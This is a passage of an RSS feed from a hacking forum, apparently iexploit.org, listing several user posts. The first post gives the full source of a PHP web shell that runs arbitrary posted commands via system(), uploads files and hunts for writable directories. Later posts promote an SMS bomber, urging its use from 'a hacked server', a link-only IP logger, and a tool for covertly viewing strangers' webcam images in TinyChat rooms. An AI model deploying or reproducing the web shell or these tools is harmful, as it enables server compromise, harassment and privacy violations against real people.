      <description><![CDATA[i also do not know how this code can be up to the land of china and I think this is simple and easy coding quite happy if someone likes my work:)<br><br><div class="PreContainer"><pre>&amp;lt;html&amp;gt;<br>&amp;lt;head&amp;gt;<br>&amp;lt;body text=\&quot;#00ff00\&quot; bgcolor=\&quot;#000000\&quot;&amp;gt;<br>&amp;lt;title&amp;gt;cakill schumbag&amp;lt;/title&amp;gt;<br>&amp;lt;meta http-equiv=\&quot;Content-Type\&quot; content=\&quot;text/html; charset=windows-1251\&quot;&amp;gt;<br>&amp;lt;center&amp;gt;&amp;lt;font face=\&quot;trebuchet ms\&quot; size=\&quot;4\&quot;&amp;gt;&amp;lt;b&amp;gt;Created By cakill-schumbag &amp;lt;/b&amp;gt;&amp;lt;/p&amp;gt;&amp;lt;/center&amp;gt;<br>&amp;lt;?php<br>print \&quot;&amp;lt;style&amp;gt;body{text&amp;#58;#999999;bgcolor&amp;#58;#000000;font-family&amp;#58;tahoma ms;font-size&amp;#58;15px;}hr{width&amp;#58;100%;height&amp;#58;2px;}&amp;lt;/style&amp;gt;\&quot;;<br>print \&quot;&amp;lt;center&amp;gt;&amp;lt;h1&amp;gt;thank's 4all keluarga laknat&amp;lt;/h1&amp;gt;&amp;lt;/center&amp;gt;\&quot;;<br>print \&quot;&amp;lt;hr&amp;gt;&amp;lt;hr&amp;gt;\&quot;;<br>closelog( );<br>$user = get_current_user( );<br>$login = posix_getuid( );<br>$euid = posix_geteuid( );<br>$ver = phpversion( );<br>$gid = posix_getgid( );<br>if ($chdir == \&quot;\&quot;) $chdir = getcwd( );<br>if(!$whoami)$whoami=exec(\&quot;whoami\&quot;);<br>?&amp;gt;<br>&amp;lt;TABLE BORDER=\&quot;0\&quot; CELLPADDING=\&quot;0\&quot; CELLSPACING=\&quot;0\&quot;&amp;gt;<br>&amp;lt;?php<br>$uname = posix_uname( );<br>while (list($info, $value) = each ($uname)) {<br>?&amp;gt;<br>&amp;lt;TR&amp;gt;<br>    &amp;lt;TD align=\&quot;left\&quot;&amp;gt;&amp;lt;DIV STYLE=\&quot;font-family&amp;#58; verdana; font-size&amp;#58; 10px;\&quot;&amp;gt;&amp;lt;b&amp;gt;&amp;lt;span style=\&quot;font-size&amp;#58; 9pt\&quot;&amp;gt;&amp;lt;?= $info ?&amp;gt;<br>      &amp;lt;span style=\&quot;font-size&amp;#58; 9pt\&quot;&amp;gt;&amp;#58;&amp;lt;/b&amp;gt; &amp;lt;?= $value ?&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/DIV&amp;gt;&amp;lt;/TD&amp;gt;<br>&amp;lt;/TR&amp;gt;<br>&amp;lt;?php<br>}<br>?&amp;gt;<br>&amp;lt;TR&amp;gt;<br>&amp;lt;TD align=\&quot;left\&quot;&amp;gt;&amp;lt;DIV STYLE=\&quot;font-family&amp;#58; verdana; font-size&amp;#58; 10px;\&quot;&amp;gt;&amp;lt;b&amp;gt;<br>    &amp;lt;span style=\&quot;font-size&amp;#58; 9pt\&quot;&amp;gt;User Info&amp;#58;&amp;lt;/b&amp;gt; uid=&amp;lt;?= $login ?&amp;gt;(&amp;lt;?= $whoami?&amp;gt;) euid=&amp;lt;?= $euid ?&amp;gt;(&amp;lt;?= $whoami?&amp;gt;) gid=&amp;lt;?= $gid ?&amp;gt;(&amp;lt;?= $whoami?&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;/DIV&amp;gt;&amp;lt;/TD&amp;gt;<br>&amp;lt;/TR&amp;gt;<br>&amp;lt;TR&amp;gt;<br>&amp;lt;TD align=\&quot;left\&quot;&amp;gt;&amp;lt;DIV STYLE=\&quot;font-family&amp;#58; verdana; font-size&amp;#58; 10px;\&quot;&amp;gt;&amp;lt;b&amp;gt;<br>    &amp;lt;span style=\&quot;font-size&amp;#58; 9pt\&quot;&amp;gt;Server Services&amp;#58;&amp;lt;/b&amp;gt; &amp;lt;?= \&quot;$SERVER_SOFTWARE $SERVER_VERSION\&quot;; ?&amp;gt;<br>    &amp;lt;/span&amp;gt;&amp;lt;/DIV&amp;gt;&amp;lt;/TD&amp;gt;<br>&amp;lt;/TR&amp;gt;<br>&amp;lt;TR&amp;gt;<br>&amp;lt;TD align=\&quot;left\&quot;&amp;gt;&amp;lt;DIV STYLE=\&quot;font-family&amp;#58; verdana; font-size&amp;#58; 10px;\&quot;&amp;gt;&amp;lt;b&amp;gt;<br>    &amp;lt;span style=\&quot;font-size&amp;#58; 9pt\&quot;&amp;gt;Permision Directory&amp;#58;&amp;lt;/b&amp;gt; &amp;lt;? if(@is_writable($chdir)){ echo \&quot;Yes\&quot;;<br><br>}else{ echo \&quot;No\&quot;; } ?&amp;gt;<br>    &amp;lt;/span&amp;gt;&amp;lt;/DIV&amp;gt;&amp;lt;/TD&amp;gt;<br>&amp;lt;/TR&amp;gt;<br>&amp;lt;TR&amp;gt;<br>&amp;lt;TD align=\&quot;left\&quot;&amp;gt;&amp;lt;DIV STYLE=\&quot;font-family&amp;#58; verdana; font-size&amp;#58; 10px;\&quot;&amp;gt;&amp;lt;b&amp;gt;<br>    &amp;lt;span style=\&quot;font-size&amp;#58; 9pt\&quot;&amp;gt;Server Address&amp;#58;&amp;lt;/b&amp;gt; &amp;lt;?= \&quot;$SERVER_ADDR $SERVER_NAME\&quot;; ?&amp;gt;<br>    &amp;lt;/span&amp;gt;&amp;lt;/DIV&amp;gt;&amp;lt;/TD&amp;gt;<br>&amp;lt;/TR&amp;gt;<br>&amp;lt;TR&amp;gt;<br>&amp;lt;TD align=\&quot;left\&quot;&amp;gt;&amp;lt;DIV STYLE=\&quot;font-family&amp;#58; verdana; font-size&amp;#58; 10px;\&quot;&amp;gt;&amp;lt;b&amp;gt;<br>    &amp;lt;span style=\&quot;font-size&amp;#58; 9pt\&quot;&amp;gt;Current User&amp;#58;&amp;lt;/b&amp;gt; &amp;lt;?= $user ?&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/DIV&amp;gt;&amp;lt;/TD&amp;gt;<br>&amp;lt;/TR&amp;gt;<br>&amp;lt;TR&amp;gt;<br>&amp;lt;TD align=\&quot;left\&quot;&amp;gt;&amp;lt;DIV STYLE=\&quot;font-family&amp;#58; verdana; font-size&amp;#58; 10px;\&quot;&amp;gt;&amp;lt;b&amp;gt;<br>    &amp;lt;span style=\&quot;font-size&amp;#58; 9pt\&quot;&amp;gt;PHP Version&amp;#58;&amp;lt;/b&amp;gt; &amp;lt;?= $ver ?&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/DIV&amp;gt;&amp;lt;/TD&amp;gt;<br>&amp;lt;/TR&amp;gt;<br>&amp;lt;/TABLE&amp;gt;<br>&amp;lt;/b&amp;gt;<br>&amp;lt;/div&amp;gt;&amp;lt;/font&amp;gt;&amp;lt;/div&amp;gt;<br>&amp;lt;?php<br><br>set_magic_quotes_runtime(0);<br><br>$currentWD = str_replace(\&quot;\\\\\&quot;,\&quot;\\\&quot;,$_POST&amp;#91;'_cwd'&amp;#93;);<br>$currentCMD = str_replace(\&quot;\\\\\&quot;,\&quot;\\\&quot;,$_POST&amp;#91;'_cmd'&amp;#93;);<br><br>$UName = `uname -a`;<br>$SCWD   = `pwd`;<br>$UserID = `id`;<br><br>if( $currentWD == \&quot;\&quot; ) {<br>    $currentWD = $SCWD;<br>}<br><br>if( $_POST&amp;#91;'_act'&amp;#93; == \&quot;List File\&quot; ) {<br>    $currentCMD = \&quot;ls -la\&quot;;<br>}<br><br>if( $_POST&amp;#91;'_act'&amp;#93; == \&quot;IP\&quot; ) {<br>    $currentCMD = \&quot;/sbin/ifconfig|grep inet\&quot;;<br>}<br><br>if( $_POST&amp;#91;'_act'&amp;#93; == \&quot;Proses\&quot; ) {<br>    $currentCMD = \&quot;ps -wx\&quot;;<br>}<br>if( $_POST&amp;#91;'_act'&amp;#93; == \&quot;Memory\&quot; ) {<br>    $currentCMD = \&quot;free\&quot;;<br>}<br><br>if( $_POST&amp;#91;'_act'&amp;#93; == \&quot;777\&quot; ) {<br>    $currentCMD = \&quot;find / -perm 777 -type d\&quot;;<br>}<br><br>if( $_POST&amp;#91;'_act'&amp;#93; == \&quot;nobody\&quot; ) {<br>    $currentCMD = \&quot;find / -user nobody -type d\&quot;;<br>}<br><br>if( $_POST&amp;#91;'_act'&amp;#93; == \&quot;apache\&quot; ) {<br>    $currentCMD = \&quot;find / -user apache -type d\&quot;;<br>}<br><br>if( $_POST&amp;#91;'_act'&amp;#93; == \&quot;httpd\&quot; ) {<br>    $currentCMD = \&quot;find / -user httpd -type d\&quot;;<br>}<br><br>if( $_POST&amp;#91;'_act'&amp;#93; == \&quot;www\&quot; ) {<br>    $currentCMD = \&quot;find / -user www -type d\&quot;;<br>}<br><br>if( $_POST&amp;#91;'_act'&amp;#93; == \&quot;www-data\&quot; ) {<br>    $currentCMD = \&quot;find / -user www-data -type d\&quot;;<br>}<br><br>print \&quot;&amp;lt;form method=post enctype=\\&quot;multipart/form-data\\&quot;&amp;gt;&amp;lt;hr&amp;gt;&amp;lt;hr&amp;gt;&amp;lt;table&amp;gt;\&quot;;<br><br>print \&quot;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;b&amp;gt;Command&amp;#58;&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;input size=100 name=\\&quot;_cmd\\&quot;<br><br>value=\\&quot;\&quot;&amp;#46;$currentCMD&amp;#46;\&quot;\\&quot;&amp;gt;&amp;lt;/td&amp;gt;\&quot;;<br>print \&quot;&amp;lt;td&amp;gt;&amp;lt;input type=submit name=_act value=\\&quot;Run\\&quot;&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;\&quot;;<br><br>print \&quot;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;b&amp;gt;Directory&amp;#58;&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;input size=100 name=\\&quot;_cwd\\&quot;<br><br>value=\\&quot;\&quot;&amp;#46;$currentWD&amp;#46;\&quot;\\&quot;&amp;gt;&amp;lt;/td&amp;gt;\&quot;;<br>print \&quot;&amp;lt;td&amp;gt;&amp;lt;input type=submit name=_act value=\\&quot;List File\\&quot;&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;\&quot;;<br><br>print \&quot;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;b&amp;gt;Upload file&amp;#58;&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;input size=88 type=file name=_upl&amp;gt;&amp;lt;/td&amp;gt;\&quot;;<br>print \&quot;&amp;lt;td&amp;gt;&amp;lt;input type=submit name=_act value=\\&quot;Upload\\&quot;&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;\&quot;;<br><br>print \&quot;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;b&amp;gt;Find&amp;#58;&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;\&quot;;<br>print \&quot;&amp;lt;td&amp;gt;&amp;lt;input type=submit name=_act value=\\&quot;IP\\&quot;&amp;gt;&amp;lt;b&amp;gt; &amp;lt;b&amp;gt;&amp;lt;input type=submit name=_act<br><br>value=\\&quot;Proses\\&quot;&amp;gt;&amp;lt;b&amp;gt; &amp;lt;b&amp;gt;&amp;lt;input type=submit name=_act value=\\&quot;777\\&quot;&amp;gt;&amp;lt;b&amp;gt; &amp;lt;b&amp;gt;&amp;lt;input type=submit<br><br>name=_act value=\\&quot;nobody\\&quot;&amp;gt;&amp;lt;b&amp;gt; &amp;lt;b&amp;gt;&amp;lt;input type=submit name=_act value=\\&quot;apache\\&quot;&amp;gt;&amp;lt;b&amp;gt; &amp;lt;b&amp;gt;&amp;lt;input<br><br>type=submit name=_act value=\\&quot;httpd\\&quot;&amp;gt;&amp;lt;b&amp;gt; &amp;lt;b&amp;gt;&amp;lt;input type=submit name=_act value=\\&quot;www\\&quot;&amp;gt;&amp;lt;b&amp;gt;<br><br>&amp;lt;b&amp;gt;&amp;lt;input type=submit name=_act value=\\&quot;www-data\\&quot;&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;\&quot;;<br><br>print \&quot;&amp;lt;/table&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;hr&amp;gt;&amp;lt;hr&amp;gt;\&quot;;<br><br>$currentCMD = str_replace(\&quot;\\\\&quot;\&quot;,\&quot;\\&quot;\&quot;,$currentCMD);<br>$currentCMD = str_replace(\&quot;\\\'\&quot;,\&quot;\'\&quot;,$currentCMD);<br><br>if( $_POST&amp;#91;'_act'&amp;#93; == \&quot;Upload\&quot; ) {<br>    if( $_FILES&amp;#91;'_upl'&amp;#93;&amp;#91;'error'&amp;#93; != UPLOAD_ERR_OK ) {<br>        print \&quot;&amp;lt;center&amp;gt;&amp;lt;b&amp;gt;Error Upload Failed!!!&amp;lt;/b&amp;gt;&amp;lt;/center&amp;gt;\&quot;;<br>    } else {<br>        print \&quot;&amp;lt;center&amp;gt;&amp;lt;pre&amp;gt;\&quot;;<br>        system(\&quot;mv \&quot;&amp;#46;$_FILES&amp;#91;'_upl'&amp;#93;&amp;#91;'tmp_name'&amp;#93;&amp;#46;\&quot; \&quot;&amp;#46;$currentWD&amp;#46;\&quot;/\&quot;&amp;#46;$_FILES&amp;#91;'_upl'&amp;#93;&amp;#91;'name'&amp;#93;&amp;#46;\&quot; 2&amp;gt;&amp;1\&quot;);<br>        print \&quot;&amp;lt;/pre&amp;gt;&amp;lt;b&amp;gt;Upload File Succes!!!&amp;lt;/b&amp;gt;&amp;lt;/center&amp;gt;\&quot;;<br>    }   <br>} else {<br>    print \&quot;\n\n&amp;lt;!-- OUTPUT STARTS HERE --&amp;gt;\n&amp;lt;pre&amp;gt;\n\&quot;;<br>    $currentCMD = \&quot;cd \&quot;&amp;#46;$currentWD&amp;#46;\&quot;;\&quot;&amp;#46;$currentCMD;<br>system(\&quot;$currentCMD 1&amp;gt; /tmp/cmdtemp 2&amp;gt;&amp;1; cat /tmp/cmdtemp; rm<br>/tmp/cmdtemp\&quot;);<br>    print \&quot;\n&amp;lt;/pre&amp;gt;\n&amp;lt;!-- OUTPUT ENDS HERE --&amp;gt;\n\n&amp;lt;/center&amp;gt;&amp;lt;hr&amp;gt;&amp;lt;hr&amp;gt;&amp;lt;center&amp;gt;&amp;lt;b&amp;gt;Cakill-Schumbag&amp;lt;/b&amp;gt;&amp;lt;/center&amp;gt;\&quot;;<br>}<br><br>exit;<br><br>?&amp;gt;</pre></div><br>and this from source <br><a class="postlink" rel="nofollow" href="http://hi.baidu.com/myetcat/blog/item/5cc6462b44850520d52af14e.html">http://hi.baidu.com/myetcat/blog/item/5 ... af14e.html</a>]]></description>
   </item>
   <item>
      <title>Lookup Code</title>
      <link>http://iexploit.org/index.php?p=/discussion/5597/lookup-code</link>
      <pubDate>Mon, 01 Aug 2011 10:54:48 -0400</pubDate>
      <dc:creator>Null Set</dc:creator>
      <guid isPermaLink="false">5597@/index.php?p=/discussions</guid>
      <description><![CDATA[<div class="PreContainer"><pre><br>&amp;lt;!-- This is a simple resolver designed for local use						--&amp;gt;<br>&amp;lt;!-- Not advised to be put on any site without adding some security features--&amp;gt;<br>&amp;lt;!-- Coded by Null Set (1 Aug 2011)											--&amp;gt;<br>&amp;lt;!-- Submitted originally to securityoverride&amp;#46;com							--&amp;gt;<br><br><br>&amp;lt;?php<br>if(isset($_POST&amp;#91;'ip'&amp;#93;)){<br>	$ip = $_POST&amp;#91;'ip'&amp;#93;;<br>	$hostname_result = gethostbyaddr($ip);<br>	echo $ip&amp;#46;\&quot; has hostname \&quot;&amp;#46;$hostname_result&amp;#46;\&quot;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;\&quot;;<br>}<br>if(isset($_POST&amp;#91;'addr'&amp;#93;)){<br>	$addr = $_POST&amp;#91;'addr'&amp;#93;;<br>	$ip_result = gethostbyname($addr);<br>	echo $addr&amp;#46;\&quot; has IP \&quot;&amp;#46;$ip_result&amp;#46;\&quot;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;\&quot;;<br>}<br>?&amp;gt;<br><br>&amp;lt;form action='' method='POST' name='ip'&amp;gt;<br>	IP Address to check&amp;#58; &amp;lt;input type='text' name='ip' /&amp;gt;&amp;lt;input type='submit' value='Submit!' /&amp;gt;<br>&amp;lt;/form&amp;gt;<br>&amp;lt;form action='' method='POST' name='addr'&amp;gt;<br>	Hostname to check&amp;#58; &amp;lt;input type='text' name='addr' /&amp;gt;&amp;lt;input type='submit' value='Submit!' /&amp;gt;<br>&amp;lt;/form&amp;gt;<br></pre></div><br><br>Hope you enjoy this. Can also be found at <a class="postlink" rel="nofollow" href="http://pastebin.com/ZfJT1ygz">http://pastebin.com/ZfJT1ygz</a>]]></description>
   </item>
   <item>
      <title>SMS / Email Bomber</title>
      <link>http://iexploit.org/index.php?p=/discussion/2579/sms-email-bomber</link>
      <pubDate>Mon, 28 Mar 2011 18:12:36 -0400</pubDate>
      <dc:creator>xpl0yt</dc:creator>
      <guid isPermaLink="false">2579@/index.php?p=/discussions</guid>
      <description><![CDATA[Sup, here is a SMS bomber i wrote in php that works on most major american phone carriers. Have fun and make sure you use a hacked server when dropping 10k SMS to someones phone. If anyone lives in the uk please send me the info for their major phone carriers or modify's it theirself please re-post it.<br><br><a class="postlink" rel="nofollow" href="http://pastie.org/1436978">http://pastie.org/1436978</a>]]></description>
   </item>
   <item>
      <title>IP Logging Script</title>
      <link>http://iexploit.org/index.php?p=/discussion/1479/ip-logging-script</link>
      <pubDate>Sat, 23 Oct 2010 23:16:31 -0400</pubDate>
      <dc:creator>SomethingMAD</dc:creator>
      <guid isPermaLink="false">1479@/index.php?p=/discussions</guid>
      <description><![CDATA[Download it :<br><br><a class="postlink" rel="nofollow" href="http://ul.to/xp321f">http://ul.to/xp321f</a><br><a class="postlink" rel="nofollow" href="http://mcaf.ee/6b340">http://mcaf.ee/6b340</a><br><a class="postlink" rel="nofollow" href="http://mcaf.ee/fd43e">http://mcaf.ee/fd43e</a><br><a class="postlink" rel="nofollow" href="http://mcaf.ee/ba971">http://mcaf.ee/ba971</a><br>__________________]]></description>
   </item>
   <item>
      <title>&quot;TinyChat Creeper&quot;</title>
      <link>http://iexploit.org/index.php?p=/discussion/2625/tinychat-creeper</link>
      <pubDate>Mon, 04 Apr 2011 00:07:38 -0400</pubDate>
      <dc:creator>xpl0yt</dc:creator>
      <guid isPermaLink="false">2625@/index.php?p=/discussions</guid>
      <description><![CDATA[This is a tool that i wrote for T1NYCH4T which allows you to remotely view images, and usernames of people that are in tinychat rooms "even works on passworded ones". The source is highly commented to help out anyone wanting to learn PHP, some of the methods would be considered "Ghetto" or "Hackish" but i am not a web developer nor html scripter. The speed of the code executes extremely fast but i am sure it could use some optimization.<br /><br />A live demo of this project can be viewed/used here - TinyChat Creeper<br />The css can be viewed here -CSS<br />The Password is: fadetoblack<br /><br />Once you are logged in you will be presented with four input box's, one checkbox and a button.<br />The enter a T1nyCh4t room name you wish to creep, and a image number from 0 - 4 "note the T1nyCh4t server stores 5 images of everyone that is on web cam", and you can change the default image size if you so wish. When the Username checkbox is pressed it will also generate a list of users in the room, create a table and place them into 3 columns. If the username is cam their name will turn into a hyperlink which will take you to the source of their image.<br /><br />The code may have a few bugs or glitches if any are found please report them here.<br /><br />please excuse the formating both websites messed it up a bit. - best viewed at pastie.<br /><br />The Code At Pastebin<br />The Code At Pastie]]></description>
   </item>
   </channel>
</rss>